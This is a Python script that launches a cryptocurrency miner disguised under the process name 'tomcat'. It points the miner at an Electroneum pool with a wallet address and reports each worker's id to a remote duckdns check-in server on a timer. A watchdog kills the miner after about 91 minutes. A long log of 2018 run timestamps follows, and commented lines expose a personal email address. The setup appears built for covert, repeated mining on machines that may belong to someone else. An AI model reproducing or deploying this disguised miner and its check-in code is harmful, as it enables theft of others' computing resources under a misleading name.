import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:06.360508
#2018-02-17 17:31:04.275724
#2018-02-17 19:19:06.985638
#2018-02-17 21:08:05.103688
#2018-02-17 22:52:05.132282
#2018-02-18 00:37:05.945363
#2018-02-18 02:27:01.749819
#2018-02-18 04:14:05.862777
#2018-02-18 06:05:05.304660
#2018-02-18 07:54:05.315375
#2018-02-18 09:43:02.162395
#2018-02-18 11:29:04.573088
#2018-02-18 13:15:09.694174
#2018-02-18 15:03:06.821403
#2018-02-18 16:51:01.630720
#2018-02-18 18:39:06.417666
#2018-02-18 20:27:04.145975
#2018-02-18 22:13:04.384185
#2018-02-19 00:02:07.552187
#2018-02-19 01:47:07.132210
#2018-02-19 03:36:06.537389
#2018-02-19 05:21:03.873416
#2018-02-19 07:07:01.679594
#2018-02-19 08:56:04.037825
#2018-02-19 10:44:08.768313
#2018-02-19 12:33:09.448896
#2018-02-19 14:21:04.306234
#2018-02-19 16:11:03.192226
#2018-02-19 17:58:05.846298
#2018-02-19 19:44:07.991278
#2018-02-19 21:31:07.104179
#2018-02-19 23:18:04.500287
#2018-02-20 01:04:07.457089
#2018-02-20 02:53:05.760765
#2018-02-20 04:41:05.372126
#2018-02-20 06:25:03.232253
#2018-02-20 08:10:03.930158
#2018-02-20 09:55:05.740124
#2018-02-20 11:40:04.068153
#2018-02-20 13:29:02.080048
#2018-02-20 15:14:01.464568
#2018-02-20 17:01:06.605077
#2018-02-20 18:50:04.683880
#2018-02-20 20:41:08.117534
#2018-02-20 22:25:06.918520
#2018-02-21 00:06:04.221562
#2018-02-21 01:53:05.459594
#2018-02-21 03:42:03.972139
#2018-02-21 05:29:06.058376
#2018-02-21 07:17:07.526555
#2018-02-21 09:03:02.100451
#2018-02-21 10:53:06.849573
#2018-02-21 12:39:06.825129
#2018-02-21 14:28:07.822308
#2018-02-21 16:13:11.920521
#2018-02-21 18:03:10.659093
#2018-02-21 19:50:11.403869
#2018-02-21 21:38:08.511664
#2018-02-21 23:26:07.065825
#2018-02-22 01:14:05.614723
#2018-02-22 03:03:05.301511
#2018-02-22 04:48:05.920464
#2018-02-22 06:33:06.078951
#2018-02-22 08:22:07.815309
#2018-02-22 10:10:08.246921
#2018-02-22 11:55:07.470561
#2018-02-22 13:42:07.192751
#2018-02-22 15:29:06.345126
#2018-02-22 17:15:12.794039
#2018-02-22 19:02:04.839820
#2018-02-22 20:54:06.531656
#2018-02-22 22:41:08.054474
#2018-02-23 00:28:07.674185
#2018-02-23 02:14:01.916233
#2018-02-23 04:04:01.558814
#2018-02-23 05:51:06.218036
#2018-02-23 07:42:04.028941
#2018-02-23 09:44:04.309120
#2018-02-23 11:51:09.461435
#2018-02-23 13:43:06.242440
#2018-02-23 15:33:01.538356
#2018-02-23 17:23:04.584912
#2018-02-23 19:08:01.341243
#2018-02-23 20:55:04.788142
#2018-02-23 22:42:08.667670
#2018-02-24 00:29:07.229718
#2018-02-24 02:20:07.169981
#2018-02-24 04:09:07.709405
#2018-02-24 05:57:05.372346
#2018-02-24 07:46:07.010487
#2018-02-24 09:32:04.743910
#2018-02-24 11:25:07.516667
#2018-02-24 13:14:06.890453
#2018-02-24 15:04:03.763702
#2018-02-24 16:54:06.980426
#2018-02-24 18:42:07.499212
#2018-02-24 20:33:06.885252
#2018-02-24 22:35:06.673431
#2018-02-25 01:43:02.250711
#2018-02-25 05:14:01.846245
#2018-02-25 11:13:01.528697